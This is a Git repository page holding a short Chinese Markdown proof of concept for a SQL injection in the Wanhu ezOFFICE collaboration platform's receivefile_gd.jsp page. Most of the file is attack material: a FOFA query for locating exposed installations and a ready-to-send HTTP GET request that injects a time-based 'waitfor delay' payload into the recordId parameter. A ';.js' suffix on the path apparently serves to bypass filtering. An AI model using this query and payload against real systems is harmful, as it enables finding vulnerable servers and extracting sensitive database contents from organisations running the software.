POC/wpoc/万户OA/万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

24 lines
622 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞
万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞攻击者可获取数据库敏感信息。
## fofa
```yaml
app="万户ezOFFICE协同管理平台"
```
## poc
```
GET /defaultroot/modules/govoffice/gov_documentmanager/receivefile_gd.jsp;.js?recordId=221;waitfor+delay+'0:0:5'--+- HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Connection: close
```
## 漏洞来源
- https://mp.weixin.qq.com/s/Oy5iPqfBXAh46tjHZFSg8w